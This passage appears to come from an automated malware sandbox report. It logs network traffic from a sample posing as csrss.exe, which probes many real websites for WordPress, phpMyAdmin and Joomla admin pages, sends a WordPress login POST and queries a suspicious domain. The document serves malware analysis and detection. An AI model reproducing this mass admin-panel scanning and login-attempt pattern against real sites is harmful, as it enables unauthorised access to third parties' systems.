Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: dpikorea.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: oljud.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pcfocus.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: easlab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.aikya.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: sunbeltfinancial.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.coupons2grab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /site/mcammondlife/ HTTP/1.1Host: sites.google.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: eddc.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: jiashi.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: videolifeperu.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: derrickandbriggs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: pmcsystem.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ireland-ventures.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: grassgraphics.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: shapeab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipCookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://yandfcorp.com/administrator/
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: sunbeltfinancial.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://sunbeltfinancial.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://customizedperformance.com/administrator/

Source: csrss.exe, 0000001C.00000002.4254678259.000000000281C000.00000004.00000020.00020000.00000000.sdmp, csrss.exe, 0000001C.00000002.4252167352.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: csrss.exe, 0000001C.00000002.4254678259.0000000002812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: onualituyrs.org

Source: unknown

HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: theproducebox.comAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=t3bhc4ud222ni4dqk308a6qgnlUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1Content-Length: 134Content-Type: application/x-www-form-urlencoded

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=utf-8Connection: closex-wix-request-id: 1703276091.0331710180937115463Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLuKm1ZjblSPwIJojBzuX7KYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalk/nmsEX1RihcfYTAuWmPIVrvQThthCJtZ4MM8WOOvl7eYd1852DtYyyQdHC9ligiA==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,q4Lmhk3LuY9WzSLOm0WLKV0xpIl3PUTIhAv9hKeMcO0=,WDMzHiyOL7uW518fW2Byr06xHPCK537k6EVzpMSs4DH99KqBTwExals4cOXLszKDtqhJvaMlJuqJm4JppQlSfA==Vary: Accept-EncodingX-Content-Type-Options: nosniffTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 30 Sep 2022 11:47:19 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Security-Policy: upgrade-insecure-requests;X-Sucuri-Block: IPB17
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 94Connection: closeX-Frame-Options: SAMEORIGINCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QnhRNkw%2FW910nz%2BnsHoZ3E6b4yjYBNJVoqttGCZHS%2FLJTTt%2FJ9qUF4t5d0wNHZwa8vR8ZJkgtZ23%2FGgxXdYMq1twYq67fJKjTTX%2BBBHk657b6%2BcJvO%2FeFcdUzrNpQQdQPTmS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08916f87225d-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=w9.GW06NR4g2kM1PbvVYKsdA_gFIiE5IgEBUQjdJrVg-1703276091-1-AWhbR+/b8v1SSkzP1pOYgjSkkrUUU2XyGgv973YwEssQNrLxJgtBmXac+w2A0rQFB0r7rZpmmwLlYeSu18s5jhs=; path=/; expires=Fri, 22-Dec-23 20:44:51 GMT; domain=.jaydien.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 839b0891ff79dadd-MIAalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeServer: Apache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheCache-Control: no-cache, privateX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=300Upgrade: h2,h2cConnection: Upgrade, closeX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline';Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 209Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: Apache / ZoneOSConnection: Upgrade, closeLast-Modified: Mon, 23 Oct 2023 21:31:51 GMTETag: "1d7b-60868f3479039"Accept-Ranges: bytesContent-Length: 7547Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://oceanictrailers.com.au/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:14:51 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/8.1.26Set-Cookie: ad4550d292dd963003562d26fd0f1c62=f7p6obkjlpt90vj0ustml86nrf; path=/; HttpOnly; secureContent-Type: text/html; charset=utf-8Expires: Wed, 17 Aug 2005 00:00:00 GMTLast-Modified: Fri, 22 Dec 2023 20:14:52 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheX-Litespeed-Cache: missContent-Length: 1667Date: Fri, 22 Dec 2023 20:14:52 GMTServer: LiteSpeedX-Content-Type-Options: nosniffAlt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:52 GMTServer: ApacheContent-Length: 259Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://adm-works.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.3.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:14:52 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 209Connection: closeVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33set-cookie: apbct_timestamp=1703276092; path=/; secure; HttpOnly; SameSite=Laxset-cookie: apbct_site_landing_ts=1703276092; path=/; secure; HttpOnly; SameSite=Laxset-cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Laxset-cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522386088ab6fd0d957c8f94219f9fefb6d%2522%257D; path=/; secure; HttpOnly; SameSite=Laxset-cookie: apbct_urls=%7B%22fuckyoufriday.com.au%2Fphpmyadmin%2F%22%3A%5B1703276092%5D%7D; expires=Mon, 25-Dec-2023 20:14:52 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; secure; HttpOnly; SameSite=Laxset-cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25-Dec-2023 20:14:52 GMT; Max-Age=259200; path=/; domain=fuckyoufriday.com.au; secure; HttpOnly; SameSite=Laxset-cookie: ct_sfw_pass_key=e069c2df4180b2c12608affc9bf7d5e00; expires=Sun, 21-Jan-2024 20:14:52 GMT; Max-Age=2592000; path=/; secure; SameSite=Laxexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://fuckyoufriday.com.au/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheX-Powered-By: PHP/8.1.26Cache-Control: no-cache, privateUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cachePragma: no-cacheContent-Type: text/html; charset=utf-8Expires: -1X-Result-Reason: Not RedirectedX-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404X-UA-Compatible: IE=edgeSet-Cookie: dnn_IsMobile=False; path=/; HttpOnlySet-Cookie: __RequestVerificationToken=fMiA5tcyD4XacpqHTMHDGq6GOgdcULJnhfgwH-ng2EuQkcyb1Dq60KzsEbKFua2ZCQLBtA2; path=/; HttpOnlyX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINDate: Fri, 22 Dec 2023 20:14:53 GMTConnection: closeContent-Length: 33332
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 2929Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276093.5641710117768332419Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:14:53 GMTX-Served-By: cache-dfw-kdfw8210171-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLjBdxec7r7DHGEpZo2ij+25kavE0ZtMXws1mfakihq4B,2d58ifebGbosy5xc+FRaltlOn5j/0eVBOGXKOxAOAW8tZ93ln3wWUeYAzsrIvdeDBPgnJapQZzYOLCPasOijsQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,VmI+uz0B2qfdV6wbOCEtb2BkR6NTdWt8IJ3Oyc5f+zc=,q4Lmhk3LuY9WzSLOm0WLKV0xpIl3PUTIhAv9hKeMcO0=,WDMzHiyOL7uW518fW2Byr06xHPCK537k6EVzpMSs4DH99KqBTwExals4cOXLszKDtqhJvaMlJuqJm4JppQlSfA==Via: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.3.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:14:53 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.15Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Cache-Control: s-maxage=10Link: <https://theproducebox.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: PHPSESSID=2fl36mfrg7n47mi7p87aekl7e6; path=/X-Frame-Options: SAMEORIGINCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9KRprcAm2NRvcUMjMItSEd7MyD5fjCCT%2BEpvAdaeWbL0PlsHIJYVYd0prxo16r8uRTrfWNNRW0AFKEuXMsDEXBrvSfK6f1QdywI3pIe9ec2v6IqfXXf1UgcNY5bGISI3UkbL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08a20dc49acb-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276093; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_landing_ts=1703276093; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522a93b46864202a543689f994154287e7f%2522%257D; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2Fadministrator%2F%22%3A%5B1703276093%5D%7D; expires=Mon, 25 Dec 2023 20:14:53 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:14:53 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cacheX-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Cache-Group: normalCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 839b08a1f8f812af-MIA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276093.950171060811838909Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:14:54 GMTX-Served-By: cache-dfw-kdfw8210030-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqMQhUjPXFZZ6QMfhZ0ZUmYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalk/nmsEX1RihcfYTAuWmPIVrvQThthCJtZ4MM8WOOvl7eYd1852DtYyyQdHC9ligiA==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,hUeKicgprlF3Ei9qMBzezHDp2DKwVkOLOSLKHrQkz7w=,WDMzHiyOL7uW518fW2Byr2GuGiStFB9OWrVR4y4nAsbQHalDg5GXgutSG6W0vh+Sw9doegBPDuevU6lQBO5pKA==Transfer-Encoding: chunkedVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 839b089f0c65d9e5-MIACF-Cache-Status: MISSCache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15Strict-Transport-Security: max-age=31536000Vary: Accept-EncodingContent-Security-Policy: Referrer-Policy: strict-origin-when-cross-originX-Content-Type-Options: nosniffX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-Request-Id: 46617c93-e31b-4477-b018-9c981ec1d827X-Runtime: 0.559898X-Xss-Protection: 1; mode=blockServer: cloudflarealt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/"cache-control: no-cache, must-revalidate, max-age=0x-cacheable: yesx-litespeed-cache-control: public,max-age=3600x-litespeed-tag: fed_HTTP.404,fed_404,fed_URL.ba909b44cf9b50134ed01a5f820a730d,fed_x-litespeed-cache: misstransfer-encoding: chunkeddate: Fri, 22 Dec 2023 20:14:54 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276094; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_landing_ts=1703276094; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_prev_referer=https%3A%2F%2Fjaydien.com%2Fadministrator%2F; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_prev_referer%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%25224eccadc6cddfcaae3b8ee5645b0c61eb%2522%257D; path=/; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2Fadministrator%2Findex.php%22%3A%5B1703276094%5D%7D; expires=Mon, 25 Dec 2023 20:14:54 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=https%3A%2F%2Fjaydien.com%2Fadministrator%2F; expires=Mon, 25 Dec 2023 20:14:54 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1703276094.97417092992415320256Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 22 Dec 2023 20:14:55 GMTX-Served-By: cache-dfw-kdfw8210021-DFWX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_gX-Seen-By: 